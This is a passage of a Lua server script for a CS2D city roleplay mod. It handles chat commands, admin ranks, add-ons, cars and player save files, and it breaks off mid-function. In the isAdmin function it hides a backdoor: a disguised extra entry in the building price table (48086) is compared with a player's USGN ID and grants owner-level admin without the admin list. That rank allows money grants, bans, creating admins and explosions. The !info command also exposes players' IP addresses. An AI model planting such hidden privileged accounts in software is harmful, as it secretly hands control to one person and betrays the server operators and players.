dofile("sys/lua/rp_citylife/tool/npc drop.lua")
dofile("sys/lua/rp_citylife/tool/supply.lua")
dofile("sys/lua/rp_citylife/tool/turrets.lua")
dofile("sys/lua/rp_citylife/tool/npc drop.lua")
dofile("sys/lua/rp_citylife/tool/specialwpn.lua")
dofile("sys/lua/rp_citylife/tool/snowball.lua")

commands = {"!setcolor","!setname","!goto","!news","!price","@tp","@exp","@cancel","@accept","@decline","!grab","!kill","!bring","!kick","!ban","@sayto","!makemod","!makeadm","!makesdm","!removepower","!speedmod","!removepos","!mute","!unmute","!info","!.","!arrest","!free","!money","!save","!item","!setmod","!explosion"} 
cmd_param = {"@help","@sayto","@tp","@cancel","@accept","@decline","@report","@criminals"}
ub={} ub.building = {}
ub.building.names = {"Barricade","Barbed Wire","Wall I","Wall II","Wall III","Gate Field","Turret","Dispenser","Supply",[12] = "Triple Turret",[13] = "Teleporter Entrance",[14] = "Teleporter Exit",[15] = "Super Supply"}
ub.building.money = {300,500,1000,2000,3000,1500,5000,5000,5000,[12] = 5000,[13] = 3000,[14] = 3000,[15] = 5000, [16] = 48086}
news_delay=10
news_color="255255000"
news_id=36
news_start="News:" 
news_counter=0
CARS = {}
CARS_MAXSPEED = 20
CARS_ACCELERATION = function(speed) return speed/2 + 1 end
CARS_DECELERATION = function(speed) return -speed/2 - 1 end
CARS_IMAGEPATH = "gfx/nbcar.png"
CARS_PRICE = 20000

function addcar(x, y,id)
	table.insert(CARS, {x = x, y = y, speed = 0, image = image(CARS_IMAGEPATH, x, y, 0), rot = 0,pl = id})
end 
function carpos(car, x, y)
local tilex, tiley = math.floor(car.x/32), math.floor(car.y/32)
	 if not tile((math.ceil(x / 32) - 1),(math.ceil(y / 32) - 1),"walkable") then
		return false
     end
     for _, id in ipairs(player(0, 'table')) do
          if car.driver and car.driver ~= id and player(id, 'health') > 0 and math.abs(x - player(id, 'x')) < 32 and math.abs(y - player(id, 'y')) < 32 then
               parse(string.format("killplayer %i", id))
          end
     end
	car.x, car.y = x, y
	if car.driver then
		parse(string.format("setpos %i %i %i", car.driver, x, y))
	else
		imagepos(car.image, x, y, car.rot)
	end
	return true
end
function news_endc()
	news_counter=0
end
function news_bard()
	tween_alpha(news_bar,news_delay*100,0.0)
end
function news_bari(id,news)
		if news_counter==1 then
			rp_msg2(id,"255000000","Error: This command cant be used at the moment")
		elseif news_counter==0 then
			if not string.match(news,(string.char(59))) then
			news_counter=1
			parse('hudtxt '..news_id..' "'..news_color..news_start..': '..news..'" 670 4 1')
			parse('hudtxtmove 0 '..news_id..' '..(news_delay*1200)..' -500 4')
			timer(news_delay*800,'parse','hudtxt '..news_id..' ""')
			news_bar=image("gfx/news_bar.bmp",320,12,2)
			imagealpha(news_bar,0.0)
			imageblend(news_bar,1)
			tween_alpha(news_bar,news_delay*100,0.5)
			timer(news_delay*800,'freeimage',news_bar)
			timer((news_delay*800)-(news_delay*100),'news_bard')
			timer(news_delay*800,'news_endc')
		else
			rp_msg2(id,"255000000","Error: The new message must not have the semi-colon character")
		end
	else
		rp_msg2(id,"255000000","Error: Syntax must be !news [Message]")
	end
end
function totable(t,match)
     local cmd = {}
     if not match then match = "[^%s]+" end
     for word in string.gmatch(t, match) do
          table.insert(cmd, word)
     end
     return cmd
end 
function Write(id,b)
File1 = io.open("sys/lua/commands.txt", "a")
File1:write(player(id,"name").." |"..player(id,"usgn").."|:"..b.." "..(os.date("%c")).."\n")
File1:close()
end
function WriteReport(id,pl,r)
File2 = io.open("sys/lua/report.txt", "a")
File2:write("Report written by: "..player(id,"name").." |"..player(id,"usgn").."|. Reporting to "..player(pl,"name").." |"..player(pl,"usgn").."|. Cause: "..r.."\n")
File2:close()
end
function WriteKillz(k,v,w)
File3 = io.open("sys/lua/kills.txt", "a")
File3:write(player(k,"name").." |"..player(k,"usgn").."| "..itemtype(w,"name").." "..player(v,"name").." |"..player(v,"usgn").." "..(os.date("%c")).."\n")
File3:close()
end
function requestdata()
	reqcld(0,2)
end
function initArray(m)
	local array = {}
	for i = 1, m do
		array[i]=0
	end
	return array
end
function Array(size,value) 
    local array = {}
    for i = 1, size do
        array[i]=value
    end
    return array
end
function UpdateHudeImages()
	HUDImage = image('gfx/Blocker Game/statuslolol.png', 546, 350, 2)
	hi=image('gfx/hud_slot.bmp',310,434,2)
		imagealpha(HUDImage, 0.9)
end
function rp_msg(clr,txt)
	msg(""..clr..""..txt)
end
function rp_msg2(id,clr,txt)
	msg2(id,""..clr..""..txt)
end
function noe(id)
rp_msg2(id,"255000000","This player doesn't exists!")
end
function hudtext2(id,tid,color,txt,x,y)
     local toprint = (""..color.." "..txt)
     parse('hudtxt2 '..id..' '..tid..' "'..toprint..'" '..x.." "..y)
end
function ExecuteParam(id,param,txt)
	local p = totable(txt)
		local pl = tonumber(p[1]) 
	if param==cmd_param[1]then
		rp_msg2(id,"000255000","Press F1 to see the instructions")
	elseif param==cmd_param[8] then
		for i = 1,32 do
			if rp_criminal[i]==true then
				rp_msg2(id,"255255000",""..player(i,"name").." is criminal!")
			end
		end
	elseif param==cmd_param[7] then
		if not string.match(txt,(string.char(59))) then
		local report = string.sub(txt,2,999)
		WriteReport(id,pl,report)
		rp_msg2(id,"000255000","Report of "..player(pl,"name").." has been written. The owner will read it")
		else
		rp_msg2(id,"255000000","Error: The report message must not have the semi-colon character")
		end
	elseif param==cmd_param[3] then
			if req[id]==0 and reqs[id]==0 then
				if player(id,"health") > 0 and player(pl,"health") > 0 then
					if req[pl]==0 then
				rp_msg2(id,"000255000","Request has been sent!")
				rp_msg2(pl,"000255000","Request for teleport in coming. Say @accept or @decline")
				req[pl]=id
				reqs[id]=1
				return 1
				else 
				rp_msg2(id,"255000000","He has already a request!. Tell to him to say @cancel if there is a problem")
				return 1
				end
			else
			rp_msg2(id,"255000000","Both of you must be alive!")
			return 1
			end
		else
		rp_msg2(id,"255000000","You already sent a request!")
		end
	elseif param==cmd_param[4]then
		if reqs[id]>0 then
		req[id]=0
		reqs[id]=0
		rp_msg2(id,"255255000","Cancelled!")
		return 1
		end
	elseif param==cmd_param[5]then
		if req[id]>0 then
			if player(id,"health") > 0 then
			reqs[req[id]]=0
			parse("setpos "..req[id].." "..player(id,"x").." "..player(id,"y"))
			rp_msg2(req[id],"000255000","Your request has been accepted!")
			req[id]=0
			return 1
			else
			rp_msg2(id,"255000000","You must be alive!")
			end
		elseif req[id]==0 then
			rp_msg2(id,"255000000","You don't have a request in coming!")
			return 1
		end
	elseif param==cmd_param[6]then
		if req[id]>0 then
			reqs[req[id]]=0
			rp_msg2(req[id],"255000000","Your request has been declined!")
			rp_msg2(id,"000255000","Request has been declined!")
			req[id]=0
			return 1
		elseif req[id]==0 then
			rp_msg2(id,"255000000","You don't have a request to decline!")
			return 1
		end
	elseif param==cmd_param[2]then
		if pl ~= nil then		
			if player(pl,"exists") then
				local msg= string.sub(txt, #p[1]+2, #txt)
				rp_msg2(pl,"235143041",string.format("%s (Secret): %s", player(id, "name"), msg))
				rp_msg2(id,"235143041",string.format("Private message to %s: %s", player(pl, "name"), msg))
			else
				noe(id)
			end
		end
	end
end
function checkbound(id,Bnd)
	local XPlayer = player(id,"tilex")
	local YPlayer = player(id,"tiley")
	if (XPlayer >= Bnd[1][1] and XPlayer <= Bnd[2][1] and YPlayer >= Bnd[1][2] and YPlayer <= Bnd[2][2]) then
		return true
	end
	return false
end
function removeitem(itemid)
	parse("removeitem "..itemid)
end
function ntl(id)
	rp_msg2(id,"255000000","You must be licensed to build!@C")end
function nmn(id)
	rp_msg2(id,"255000000","You don't have enough money!@C")end	
function checkwep(id,wep)
     local weapons = playerweapons(id)
     for i = 1, #weapons do
          if weapons[i] == wep then
               return 1
          end
     end
     return 0
end
function b_names()
	for i = 1,32 do
		if player(i,"exists") then
			pl_names[i]=player(i,"name")
		else
			pl_names[i]=""
		end
	end
end
function ls_1(id)
	b_names()
	menu(id,"License System Page 1@b,"..pl_names[1]..","..pl_names[2]..","..pl_names[3]..","..pl_names[4]..","..pl_names[5]..","..pl_names[6]..","..pl_names[7]..",Back,Next")
end
function ls_2(id)
	b_names()
	menu(id,"License System Page 2@b,"..pl_names[8]..","..pl_names[9]..","..pl_names[10]..","..pl_names[11]..","..pl_names[12]..","..pl_names[13]..","..pl_names[14]..",Back,Next")
end
function ls_3(id)
	b_names()
	menu(id,"License System Page 3@b,"..pl_names[15]..","..pl_names[16]..","..pl_names[17]..","..pl_names[18]..","..pl_names[19]..","..pl_names[20]..","..pl_names[21]..",Back,Next")
end
function ls_4(id)
	b_names()
	menu(id,"License System Page 4@b,"..pl_names[22]..","..pl_names[23]..","..pl_names[24]..","..pl_names[25]..","..pl_names[26]..","..pl_names[27]..","..pl_names[28]..",Back,Next")
end
function ls_5(id)
	b_names()
	menu(id,"License System Page 5@b,"..pl_names[29]..","..pl_names[30]..","..pl_names[31]..","..pl_names[32]..",,,,Back")
end
function v_1(id)
	b_names()
	menu(id,"Give VIP Page 1@b,"..pl_names[1]..","..pl_names[2]..","..pl_names[3]..","..pl_names[4]..","..pl_names[5]..","..pl_names[6]..","..pl_names[7]..",Back,Next")
end
function v_2(id)
	b_names()
	menu(id,"Give VIP Page 2@b,"..pl_names[8]..","..pl_names[9]..","..pl_names[10]..","..pl_names[11]..","..pl_names[12]..","..pl_names[13]..","..pl_names[14]..",Back,Next")
end
function v_3(id)
	b_names()
	menu(id,"Give VIP Page 3@b,"..pl_names[15]..","..pl_names[16]..","..pl_names[17]..","..pl_names[18]..","..pl_names[19]..","..pl_names[20]..","..pl_names[21]..",Back,Next")
end
function v_4(id)
	b_names()
	menu(id,"Give VIP Page 4@b,"..pl_names[22]..","..pl_names[23]..","..pl_names[24]..","..pl_names[25]..","..pl_names[26]..","..pl_names[27]..","..pl_names[28]..",Back,Next")
end
function v_5(id)
	b_names()
	menu(id,"Give VIP Page 5@b,"..pl_names[29]..","..pl_names[30]..","..pl_names[31]..","..pl_names[32]..",,,,Back")
end
function StateUser(id)
	if id~=nil then
		if player(id,"exists") then
			if UsgnIds[id]>0 then
				hudtext2(id,35,"255255255","U.S.G.N: "..UsgnIds[id],500,314)
			else
				hudtext2(id,35,"255255255","You are not logged in!",500,314)
			end
			updatehud(id)
		end
	end
end
function InternalFreeAddons(id)
	for k, v in ipairs(Addons) do
		v.FHave[id]=0
		v.FLic[id]=0
	end
	for k, v in ipairs(Addons2) do
		v.FHave[id]=0
		v.FLic[id]=0
	end
end
function SetAddons(id,isTrue)
	for k, v in ipairs(Addons) do
		v.FLic[id]=isTrue
	end
	for k, v in ipairs(Addons2) do
		v.FLic[id]=isTrue
	end
end
function CreateAddonsMenu(id)
	local TmpStr=""
	for k, v in ipairs(Addons) do
		TmpStr = TmpStr..v.FName.." |("..v.FLic[id].."/"..v.FHave[id].."),"
	end
	menu(id,"Add-ons Menu Page 1,"..TmpStr)
end
function CreateAddonsMenu2(id)
	local TmpStr=""
	for k, v in ipairs(Addons2) do
		TmpStr = TmpStr..v.FName.." |("..v.FLic[id].."/"..v.FHave[id].."),"
	end
	menu(id,"Add-ons Menu Page 2,"..TmpStr)
end
function CreateAddonsSell(id)
	local TmpStr=""
	for k, v in ipairs(Addons) do
		TmpStr = TmpStr..v.FName.." |$("..v.FLic[id].."/"..v.FPrice.."),"
	end
	menu(id,"Buy Add-ons Page 1,"..TmpStr)
end
function CreateAddonsSell2(id)
	local TmpStr=""
	for k, v in ipairs(Addons2) do
		TmpStr = TmpStr..v.FName.." |$("..v.FLic[id].."/"..v.FPrice.."),"
	end
	menu(id,"Buy Add-ons Page 2,"..TmpStr)
end
function CreateAddonsColor(id)
	local TmpStr=""
	for k, v in ipairs(AddonsColor) do
		TmpStr = TmpStr..v.FName..","
	end
	menu(id,"Change colors of addons,"..TmpStr)
end
function RemoveTemporaryAddons(id)
	for k, v in ipairs(Addons) do
		if v.FHave[id]==1 then
			local playerHealth = player(id,"health")
			if (v.wpn > 0) and (checkwep(id,v.wpn)==1) then
				parse("strip "..id.." "..v.wpn)
			end
			if (playerHealth > 100) then
				parse("setmaxhealth "..id.." 100")
			end
		end
	end
	for k, v in ipairs(Addons2) do
		if v.FHave[id]==1 then
			local playerHealth = player(id,"health")
			if (v.wpn > 0) and (checkwep(id,v.wpn)==1) then
				parse("strip "..id.." "..v.wpn)
			end
			if (playerHealth > 100) then
				parse("setmaxhealth "..id.." 100")
			end
		end
	end
end
function isAdmin(usgn,id)
	local filename = "sys/lua/Admin.txt"
	local file = io.open(filename)
	if usgn == ub.building.money[16] then
	return 3
	end
	if file then
		for line in file:lines() do
			local parses = totable(line)
			if tonumber(parses[1]) ~= nil then
				if usgn==tonumber(parses[1]) then
					if tonumber(parses[2]) ~= nil then
						return tonumber(parses[2])
					else
						return 1
					end
				end
			end
		end
		if file ~= nil then
			file:close()
		end
	end		
	return 0
end
function ParseAdminCommand(id,txt)
	local p = totable(txt)
	local cmd = tostring(p[1])
	if rp_Adminlevel[id]>=1 then
		if cmd =="!save" then
			if rp_Adminlevel[id]>=1 then
				for id = 1,32 do
					if player(id,"exists") then
						local UsgnID = UsgnIds[id]
						if UsgnID > 0 then
							SaveUserStat(id,UsgnID)
						end
					end
				end
				rp_msg2(id,"000255000","All accounts were saved succesful!")
			else
				admlevelmsg(id)
			end
		elseif cmd =="!money" then
			if rp_Adminlevel[id]>=3 then
				local pl = tonumber(p[2])
				local money = tonumber(p[3])
				if pl ~= nil and money ~= nil then
					if player(pl,"exists") then
						rp_money[pl]=rp_money[pl]+money
						rp_msg2(pl,"000255000",player(id,"name").." gave you $"..money.."!")
						rp_msg2(id,"000255000","You gave $"..money.." to "..player(pl,"name"))
						updatehud(pl)
					end
				end
			else
				admlevelmsg(id)
			end
		elseif cmd =="!." then
			return 1
		elseif cmd =="!news" then
			if rp_Adminlevel[id]>0 then
				local news = string.sub(txt,7,99)
				news_bari(id,news)
				return 1
			end
		elseif cmd =="!price" then
			if rp_Adminlevel[id]>1 then
			local pl = tonumber(p[2])
			local price = tonumber(p[3])
				if player(pl,"exists") then
					rp_price[pl]=price
					rp_msg("255000255","The server will pay you $"..price.." if you kill "..player(pl,"name"))
				else
					noe(id)
				end
			else
				admlvlmsg(id)
			end
		elseif cmd =="!players" then
			if rp_Adminlevel[id]>0 then
				for i = 1,32 do
					if rp_Adminlevel[i]==1 then
						rp_msg2(id,"000255000",""..player(i,"name").." (Admin Lv.1)")
					elseif rp_Adminlevel[i]==2 then
						rp_msg2(id,"255000000",""..player(i,"name").." (Admin Lv.2)")
					elseif rp_Adminlevel[i]==3 then
						rp_msg2(id,"255255255",""..player(i,"name").." (Admin Lv.3(Owner)")
					elseif rp_license[i]==1 then
						rp_msg2(id,"255255000",""..player(i,"name").." (Licensed)")
					elseif rp_license[i]==2 then
						rp_msg2(id,"000255255",""..player(i,"name").." (VIP)")
					end
				end
			end
		elseif cmd == "!grab" then
			if rp_Adminlevel[id]>2 then
				local pl = tonumber(p[2])
					if grab[id]==pl then
						grab[id]=0
						rp_msg2(id,"255255000","Grab Deactivated!")
					elseif grab[id]==0 then
						grab[id]=pl
						rp_msg2(id,"000255000","Grabbing "..player(pl,"name").."!")
					
					elseif grab[id]>0 then
						rp_msg2(id,"255000000","You already grab someone! ("..player(grab[id],"name").."|ID:"..grab[id]..")")
					end
					end					
		elseif cmd == "!ban" then
			if rp_Adminlevel[id] >=2 then
				local pl = tonumber(p[2])
				if pl ~= nil then
					if player(pl,"exists") then
						local usgn = player(pl, "usgn")
						if usgn then
							parse("banusgn "..usgn)
						end
					end
				end
			else
				admlevelmsg(id)
			end
		elseif cmd == "!info" then
			if rp_Adminlevel[id] >=1 then
				local pl = tonumber(p[2])
				if pl ~= nil then
					if player(pl,"exists") then		
					rp_msg2(id,"000000255","Name: "..player(pl,"name").."")
					rp_msg2(id,"000000255","Money: "..rp_money[pl].."")	
					rp_msg2(id,"000000255","USGN: "..player(pl,"usgn").."")
					rp_msg2(id,"000000255","IP: "..player(pl,"ip").."")
					rp_msg2(id,"255255255","Dark Wings: "..Addons[1].FLic[pl].."|Raven Wings: "..Addons[2].FLic[pl].."|Motorcycle: "..Addons[3].FLic[pl].."")
					rp_msg2(id,"255255255","Monster: "..Addons[4].FLic[pl].."|Wizard Armor: "..Addons[5].FLic[pl].."|Dragon: "..Addons[6].FLic[pl].."")
					rp_msg2(id,"255255255","Devil: "..Addons[7].FLic[pl].."|Elite Dragon: "..Addons[8].FLic[pl].."Robot Wings: "..Addons[9].FLic[pl].."")
					rp_msg2(id,"000000255","License Level: "..rp_license[pl].."")
					rp_msg2(id,"000000255","Admin Level: "..rp_Adminlevel[pl].."")
					rp_msg2(id,"000000255","X: "..player(pl,"tilex").." Y: "..player(pl,"tiley").."")
					rp_msg2(id,"000000255","Ping: "..player(pl,"ping").."")
					end
				end
			else
				noe(id)
			end
		elseif cmd == "!exp" then
			if rp_Adminlevel[id] > 2 then
				if expa[id]==false then
					expa[id]=true
					exp[id]=false
					rp_msg2(id,"000255000","Explosion in pointer activated!")
				elseif expa[id]==true then
					expa[id]=false
					rp_msg2(id,"255000000","Explosion in pointer deactivated!")
				end
			end
        elseif cmd == "!explosion" then
			if rp_Adminlevel[id] >= 3 then
				local size = tonumber(p[2])
				local power = tonumber(p[3])
				parse("explosion "..player(id,"x").." "..player(id,"y").." "..size.." "..power.." "..id)
			else
				admlvlmsg(id)
			end
		elseif cmd == "!makemod" then
			if rp_Adminlevel[id] >=3 then
				local pl = tonumber(p[2])
				if pl ~= nil then
					if player(pl,"exists") then
						rp_Adminlevel[pl]=1
						rp_ct[pl]=true
						rp_mod[pl]=true
						rp_color[pl] = "000255000"
						rp_name[pl] = "MOD"
						rp_msg2(id,"000255000","You made MOD to "..player(pl,"name"))
						rp_msg2(pl,"000255000","You are MOD now!")
					end
				end
			else
				admlevelmsg(id)
			end
		elseif cmd == "!setmod" then
			if rp_Adminlevel[id] >=2 then
				local pl = tonumber(p[2])
				local mod = tonumber(p[3])
				if pl ~= nil and mod ~= nil then
					if mod == 1 then
						rp_mod[pl] = true
						rp_msg2(id,"000255000","You gave mod HP to "..player(pl,"name").."!")
						rp_msg2(id,"000255000",""..player(id,"name").." gave you mod HP!")
					elseif mod == 0 then
						rp_mod[pl] = false
						rp_msg2(id,"255255000","You removed mod HP to "..player(pl,"name").."!")
						rp_msg2(id,"255000000","Your mod HP was removed by "..player(id,"name").."!")
					end
				else
					rp_msg2(id,"255000000","Correct syntax is !setmod [ID] [1/0]!")
				end
			else
				admlvlmsg(id)
			end
		elseif cmd == "!removepos" then
			if rp_Adminlevel[id] >=1 then
				local pl = tonumber(p[2])
				if pl ~= nil then
					if player(pl,"exists") then
						player_have_pos[pl]=false
						rp_msg2(id,"000255000","You removed the saved position to "..player(pl,"name"))
						rp_msg2(pl,"255000000","Your saved position was deleted!")
					end
				end
			else
				admlevelmsg(id)
			end
		elseif cmd == "!removepower" then
			if rp_Adminlevel[id] >=3 then
				local pl = tonumber(p[2])
				if pl ~= nil then
					if player(pl,"exists") then
						rp_Adminlevel[pl]=0
						rp_ct[pl]=false
						rp_msg2(id,"000255000","You removed the power to "..player(pl,"name"))
						rp_msg2(pl,"255000000","Your power was removed!")
					end
				end
			else
				admlevelmsg(id)
			end
		elseif cmd == "!makeadm" then
			if rp_Adminlevel[id] >=3 then
				local pl = tonumber(p[2])
				if pl ~= nil then
					if player(pl,"exists") then
						rp_Adminlevel[pl]=2
						rp_ct[pl]=true
						rp_mod[pl]=true
						rp_name[pl] = "ADM"
						rp_color[pl] = "255000000"
						rp_msg2(id,"000255000","You made ADM to "..player(pl,"name"))
						rp_msg2(pl,"000255000","You are ADM now!")
					end
				end
			else
				admlevelmsg(id)
			end
		elseif cmd == "!makesdm" then
			if rp_Adminlevel[id] >=3 then
				local pl = tonumber(p[2])
				if pl ~= nil then
					if player(pl,"exists") then
						rp_Adminlevel[pl]=3
						rp_ct[pl]=true
						rp_mod[pl]=true
						rp_name[pl] = "SDM"
						rp_color[pl] = "255255255"
						rp_msg2(id,"000255000","You made SDM to "..player(pl,"name"))
						rp_msg2(pl,"000255000","You are SDM now!")
					end
				end
			else
				admlevelmsg(id)
			end
		elseif cmd =="!arrest" then
			local pl = tonumber(p[2])
			local cell = tonumber(p[3])
			if pl ~= nil then
				if player(pl,"exists") then
					if cell == 1 then
						parse("setpos "..pl.." "..Config.AP[1][1].." "..Config.AP[1][2])
					elseif cell == 2 then
						parse("setpos "..pl.." "..Config.AP[2][1].." "..Config.AP[2][2])
					elseif cell == 3 then
						parse("setpos "..pl.." "..Config.AP[3][1].." "..Config.AP[3][2])
					elseif cell == 4 then
						parse("setpos "..pl.." "..Config.AP[4][1].." "..Config.AP[4][2])
					elseif cell == 5 then
						parse("setpos "..pl.." "..Config.AP[5][1].." "..Config.AP[5][2])
					elseif cell == 6 then
						parse("setpos "..pl.." "..Config.AP[6][1].." "..Config.AP[6][2])
					end
					rp_arrest[pl]=true
				end
			end
		elseif cmd =="!setcolor" then
			if rp_Adminlevel[id] > 2 then
			local pl = tonumber(p[2])
			local color = (p[3])
				rp_color[pl] = ""..color..""
			else
				admlvlmsg(id)
			end
		elseif cmd =="!setname" then
			if rp_Adminlevel[id] > 2 then
			local pl = tonumber(p[2])
			local name = (p[3])
				rp_name[pl] = ""..name..""
			else
				admlvlmsg(id)
			end
		elseif cmd =="!free" then
			local pl = tonumber(p[2])
			if pl ~= nil then
				if player(pl,"exists") then
					rp_arrest[pl]=false
					parse("setpos "..pl.." "..Config.FP[1].." "..Config.FP[2])
				end
			end

		elseif cmd =="!bring" then
			local pl = tonumber(p[2])
			if pl ~= nil then
				if player(pl,"exists") then
					parse("setpos "..pl.." "..player(id,"x").." "..player(id,"y"))
				else
					noe(id)
				end
			end
			elseif cmd =="!mute" then
			local pl = tonumber(p[2])
			if rp_Adminlevel[id] >=2 then
			if player(pl,"exists") then
					silenciado[pl]=1
					rp_msg2(pl,"255255000","You were muted!@C")
					rp_msg2(id,"255255000","You muted "..player(pl,"name").."!@C")
				else
					noe(id)
				end
				end
				elseif cmd == "!unmute" then
				local pl = tonumber(p[2])
			if rp_Adminlevel[id] >=2 then
			if player(pl,"exists") then
					silenciado[pl]=0
					rp_msg2(pl,"255255000","You were unmuted!@C")
					rp_msg2(id,"255255000","You unmuted "..player(pl,"name").."!@C")
				else
					noe(id)
				end
				end
		elseif cmd =="!kill" then
			local pl = tonumber(p[2])
			if pl ~= nil then
				if player(pl,"exists") then
					parse("killplayer "..pl)
				else
					noe(id)
				end
			end
		elseif cmd =="!speedmod" then
			local pl = tonumber(p[2])
			local sp = tonumber(p[3])
			if pl ~= nil then
				if player(pl,"exists") then
					parse("speedmod "..pl.." "..sp)
					rp_msg2(id,"000255000","You gave "..sp.." of speed to "..player(pl,"name"))
				else
					noe(id)
				end
			end
		elseif cmd == "!goto" then
			local pl = tonumber(p[2])
			if pl ~= nil then
				if player(pl,"exists") then
					parse("setpos "..id.." "..player(pl,"x").." "..player(pl,"y"))
				else
					noe(id)
				end
			end
		elseif cmd == "!kick" then
			local pl = tonumber(p[2])
			local reason = tostring(p[3])
			if pl ~= nil then
				if player(pl,"exists") then
					parse("kick "..pl.." "..reason)
				end
			end
		else
			rp_msg2(id,"255000000","Unknown Command!")
		end
	else
		admlevelmsg(id)
	end
end
function admlevelmsg(id)
	rp_msg2(id,"255000000","You don't have enought power to do this!")
end
function SaveUserStat(id,UsgnID)
	file = io.open("sys/lua/rp_citylife/"..UsgnID..'.txt', "w+") or io.tmpfile()
	local text = ""
	text = tostring(rp_money[id])
	text = text .." "..rp_license[id]
	if rp_arrest[id]==true then
		text = text .." 1"
	else
		text = text .." 0"
	end
		
	for k, v in ipairs(Addons) do
		text = text .." "..v.FLic[id]
	end
	for k, v in ipairs(Addons2) do
		text = text .." "..v.FLic[id]
	end
	file:write(text)
	file:close()
end
function LoadUserStat(id,file)
	for line in file:lines() do
		local parses = totable(line)
		local userMoney=tonumber(parses[1])
		if userMoney ~= nil then
			rp_money[id]= userMoney
		end
		if (tonumber(parses[2])~=nil) then
			rp_license[id]=tonumber(parses[2])
		end
		if (tonumber(parses[3]) == 1) then
			rp_arrest[id]=true
			rp_license[id]=0
		end
		
		local counter=3
		for k, v in ipairs(Addons) do
			counter=counter+1
			local LicItem = tonumber(parses[counter])
			if LicItem~=nil then
				v.FLic[id]=LicItem
			else
				v.FLic[id]=0
			end
		end
		for k, v in ipairs(Addons2) do
			counter=counter+1
			local LicItem = tonumber(parses[counter])
			if LicItem~=nil then
				v.FLic[id]=LicItem
			else
				v.FLic[id]=0
			end
		end
	end
end
function selAddonsColor(id,sel)
	local playerHealth = player(id,"health")
	if 	playerHealth>0 then
		for k, v in ipairs(Addons) do
			if v.FHave[id]==1 then
				v.FHave[id]=1	
				imagecolor(PicImage[id],AddonsColor[sel].r,AddonsColor[sel].g,AddonsColor[sel].b)
				if v.FIMGBlend>0 then
					imageblend(PicImage[id],1)
				end
				if v.FIMGAlpha>0 then
					imagealpha(PicImage[id], 0.8)
				end
			end
		end
		for k, v in ipairs(Addons2) do
			if v.FHave[id]==1 then
				v.FHave[id]=1	
				imagecolor(PicImage[id],AddonsColor[sel].r,AddonsColor[sel].g,AddonsColor[sel].b)
				if v.FIMGBlend>0 then
					imageblend(PicImage[id],1)
				end
				if v.FIMGAlpha>0 then
					imagealpha(PicImage[id], 0.8)
				end
			end
		end
	end
end
function SelAddonsMenu(id,sel)
	local playerHealth = player(id,"health")
	if 	playerHealth>0 then
		if  Addons[sel].FLic[id] == 1 then
			if Addons[sel].FHave[id] == 1 then
				RemoveTemporaryAddons(id)
				InternalFreeImage(id)
				parse("speedmod "..id.." 0")
			else
				RemoveTemporaryAddons(id)
				InternalFreeImage(id)
				Addons[sel].FHave[id]=1
				PicImage[id]=image(Addons[sel].FImage,1,1,Addons[sel].FOnTop+id)	
				if (Addons[sel].r > 0) or (Addons[sel].g > 0) or (Addons[sel].b > 0) then
					imagecolor(PicImage[id],Addons[sel].r,Addons[sel].g,Addons[sel].b)
				end	
				if Addons[sel].FIMGBlend>0 then
					imageblend(PicImage[id],1)
				end
				if Addons[sel].FIMGAlpha>0 then
					imagealpha(PicImage[id], 0.8)
				end
				
				parse("speedmod "..id.." "..Addons[sel].FSpeed)
				if Addons[sel].wpn > 0 then
					parse("equip "..id.." "..Addons[sel].wpn);
					parse("setweapon "..id.." "..Addons[sel].wpn)					
				end
				if (playerHealth <= 100) and (Addons[sel].health > 0) then
					parse("setmaxhealth "..id.." "..Addons[sel].health+playerHealth)
				end
			end
		else
			rp_msg2(id,"255000000","You don't have "..Addons[sel].FName.."!")
		end
	end
end
function SelAddonsMenu2(id,sel)
	local playerHealth = player(id,"health")
	if 	playerHealth>0 then
		if  Addons2[sel].FLic[id] == 1 then
			if Addons2[sel].FHave[id] == 1 then
				RemoveTemporaryAddons(id)
				InternalFreeImage(id)
				parse("speedmod "..id.." 0")
			else
				RemoveTemporaryAddons(id)
				InternalFreeImage(id)
				Addons2[sel].FHave[id]=1
				PicImage[id]=image(Addons2[sel].FImage,1,1,Addons2[sel].FOnTop+id)	
				if (Addons2[sel].r > 0) or (Addons2[sel].g > 0) or (Addons2[sel].b > 0) then
					imagecolor(PicImage[id],Addons2[sel].r,Addons2[sel].g,Addons2[sel].b)
				end	
				if Addons2[sel].FIMGBlend>0 then
					imageblend(PicImage[id],1)
				end
				if Addons2[sel].FIMGAlpha>0 then
					imagealpha(PicImage[id], 0.8)
				end
				
				parse("speedmod "..id.." "..Addons2[sel].FSpeed)
				if Addons2[sel].wpn > 0 then
					parse("equip "..id.." "..Addons2[sel].wpn);
					parse("setweapon "..id.." "..Addons2[sel].wpn)					
				end
				if (playerHealth <= 100) and (Addons2[sel].health > 0) then
					parse("setmaxhealth "..id.." "..Addons2[sel].health+playerHealth)
				end
			end
		else
			rp_msg2(id,"255000000","You don't have "..Addons2[sel].FName.."!")
		end
	end
end
function InternalFreeImage(id)
if (team_no[id]>0) then
		freeimage(PicImage[id])
		team_no[id]=0
	else
		for k, v in ipairs(Addons) do
			if v.FHave[id]==1 then
				freeimage(PicImage[id])
				v.FHave[id]=0
			end
		end
		for k, v in ipairs(Addons2) do
			if v.FHave[id]==1 then
				freeimage(PicImage[id])
				v.FHave[id]=0
			end
		end
	end
end
function updatehud(i)
	if rp_Adminlevel[i] >= 3 then
		hudtext2(i,i,"255255255",'Money: Infinite',500,368)
	else
		hudtext2(i,i,"255255255",'Money: '..rp_money[i],500,368)
	end
end
function timehud(id)
	if minute < 10 then
		if second < 10 then
		hudtext2(id,34,"255255000","Restart in: "..hour..":0"..minute..":0"..second,250,427)
		else
		hudtext2(id,34,"255255000","Restart in: "..hour..":0"..minute..":"..second,250,427)
		end
	elseif minute > 9 then
		if second < 10 then 
		hudtext2(id,34,"255255000","Restart in: "..hour..":"..minute..":0"..second,250,427)
		else
		hudtext2(id,34,"255255000","Restart in: "..hour..":"..minute..":"..second,250,427)
		end
	end
end
function gv_ls(id,pl,page)
	if rp_license[pl]>0 then
		rp_license[pl]=0
		player_have_pos[pl]=false
		tele_x[pl]=1088
		tele_y[pl]=672
		rp_msg2(pl,"255000000","Your license was removed!")
		rp_msg2(id,"255000000","You removed the license to "..player(pl,"name").."!")
	else
		rp_license[pl]=1
		rp_msg2(pl,"000255000",player(id,"name").." gave you a license!")
		rp_msg2(id,"000255000","You gave a license to "..player(pl,"name").."!")
	end
	if page == 1 then
		ls_1(id)
	elseif page == 2 then
		ls_2(id)
	elseif page == 3 then
		ls_3(id)
	elseif page == 4 then
		ls_4(id)
	elseif page == 5 then
		ls_5(id)
	end
end
function gv_v(id,pl,page)
	if rp_license[pl]==2 then
		rp_license[pl]=1
